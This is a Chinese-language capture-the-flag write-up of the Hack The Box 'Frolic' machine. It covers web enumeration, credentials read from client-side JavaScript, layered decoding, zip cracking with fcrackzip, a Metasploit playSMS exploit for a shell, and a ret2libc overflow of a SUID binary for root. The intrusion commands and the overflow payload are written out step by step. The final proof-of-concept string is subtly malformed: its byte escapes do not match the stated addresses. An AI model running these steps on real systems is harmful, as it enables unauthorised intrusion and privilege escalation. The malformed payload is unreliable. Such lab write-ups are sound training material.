Hack The Box Frolic WriteUp

这是一道PWN题，知识点在于Ret2LibC攻击，两篇不错的参考文档：
http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/Return_to_libc/Return_to_libc.pdf
https://www.exploit-db.com/docs/english/28553-linux-classic-return-to-libc-&-return-to-libc-chaining-tutorial.pdf

1.在端口扫描上吃了小亏，看到139、445开放后就中断了扫描，结果搞了半天samba没有进展，重启扫描后才发现了9999端口，而渗透的起始点正是这个端口。
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
1880/tcp open http Node.js (Express middleware)
9999/tcp open http nginx 1.10.3 (Ubuntu)

2.通过浏览器访问，可以看到一个默认的nginx欢迎页面，很显然需要目录爆破了，利用dirbuster可以发现admin，test，dev，backup，loop和playsms目录。其中admin目录需要密码，backup页面提供了一组用户名密码，playsms是知名网站框架，同样需要用户名密码，下面一个目录一个目录寻找线索。先记录backup页面得到的账户：
user - admin
password - imnothuman

backup页面

3.在admin页面开始尝试破解登录密码，F12进入开发者模式后能发现一个诡异的现象，当填写好用户名密码并点击Login按钮后，页面没有发出任何的Post或Get报文，直接提示密码错，还剩两次机会。这说明用户凭据的校验是在前台完成的。

没有任何网络通信

查看网页源码，发现加载了login.js，在这段脚本里可以直接拿到明文密码

登录密码

4.登录后会拿到一段恼人的编码文件，这是0ok编码，利用这个网站可以直接翻译原文：
Nothing here check /asdiSIAJJ0QWE9JAS

asdiSIAJJ0QWE9JAS目录

进入/asdiSIAJJ0QWE9JAS目录，获得另一端编码，这回看起来像是base64。拷贝这段编码，利用echo "编码串" | base64 -d > decodefile将解码后的结果写入文件，发现这是一个zip压缩包。

base64

5.打开这个压缩包需要输入密码，利用fcrackzip对密码进行爆破，很快能拿到结果，密码就是password。
fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt decodefile

6.压缩包里保存了一个.php文件，查看后发现这是一串Hex编码，可以利用http://www.unit-conversion.info/texttools/hexadecimal/将它进行转码，转码后是另一串base64。

Hex2Text

而base64解码后的串是一串Brainfuck

Brainfuck

同样利用https://www.splitbrain.org/_static/ook/拿到明文：idkwhatispass

7.账户admin：idkwhatispass能够登录http://10.10.10.111:9999/playsms。针对知名网站框架的攻击，可以依赖漏洞。在msf平台中，利于模块 exploit/multi/http/playsms_uploadcsv_exec可以轻松的拿下shell，uset.txt就位于/home/ayush目录下。

palysms

8.现在面临的是权限提升问题。检查SUID文件，发现可疑程序/home/ayush/.binary/rop被设置了S位。
find / -user root -perm -4000 -exec ls -ldb {} ; > /tmp/ckprm

SUID

9.运行程序发现rop要求用户输入一段Message，这很可能是一道溢出题，通过溢出拿到root shell。要在目标上顺利执行溢出，需要关注以下问题：
*系统的地址随机化是否开启？0代表关闭 sysctl -a --pattern "randomize"
*添加环境变量SHELL='/bin/sh' ，有的不存在，有的是bash，而bash会默认取消继承的root特权
对于本题来说，地址随机关闭，需要利用export SHELL='/bin/sh'添加环境变量。

目标情况

10.攻击思路是，因为目前的系统和处理器都有数据执行保护，堆栈上不允许运行程序，所以shell code只能从已经的代码中拼凑。若想利用system（'/bin/sh'）弹出shell，则需要找到system的函数地址和/bin/sh字符串的位置。函数system可以在libc中搜索这是每个程序都会引用的库文件，/bin/sh字符串因为我们手动输入所以一定存在于环境变量的内存中，那么我们还要做的就是定位溢出点，将system地址和参数入站。
11.在libc中搜索系统函数可以利用以下脚本：
https://0xdeadbeef.info/code/libc-search.c
gcc无法在目标上直接运行，需要在kali编译后上传，注意kali是64位系统，目标是32位系统，编译指令如下：
apt-get update
apt-get install gcc-multilib g++-multilib
(可能错误：In file included from location.c:1:/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: 没有那个文件或目录)
gcc libc-search.c -o libc-search -lc -ldl -m32
运行结果如下：
system 0xb7e53da0
exit 0xb7e479d0 //非必需保证函数正常退出
/bin/sh 没有找到

找地址

我们还需要用简单的代码自己搜索"/bin/sh"的位置，运行结果位于地址bfffffe0处，这是SHELL的位置，/bin/sh应该还要退后6位。

#include 
#include 
#include 
int main()
{
  char* shell = getenv("SHELL");
  printf("%x\n", (unsigned int)shell);
}

12.利用脚本生成随机串，提交rop运行并定位溢出点，参考：
https://www.offensive-security.com/metasploit-unleashed/writing-an-exploit/
随机串生成：/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
步骤如下：
*利用pattern_create.rb生成随机字符串
*gdb跟踪调试
利用pattern_offset.rb定位溢出点

定位溢出点

13.构造POC，目前已经获得准确的溢出偏移，System函数地址，Exit函数地址以及"/bin/sh"字符串位置，接下来要做的就是将他们组合起来，利用溢出点把它们压入栈中：
POC：52位字符串 + System函数地址 + Exit函数地址 + "/bin/sh"字符串地址
POC： `python -c 'print "A"52 + "\x0a\x3d\xe5\b7" + "\x0d\x79\xe4\b7" + "\xe6\xff\xff\xbf" (注意地址的小端点格式)

poc运行结果

可以看出，sh已经被成功调用，但是传入参数有误，说明/bin/sh地址没有正确找到，这时可以适当放宽搜索范围在bfffffe0前后10位调整poc即bffffff0 - bfffffd0。最后可以在bfffffd8处准确找到/bin/sh字符串并成功弹出shell。

85d3fdf03f969892538ba9a731826222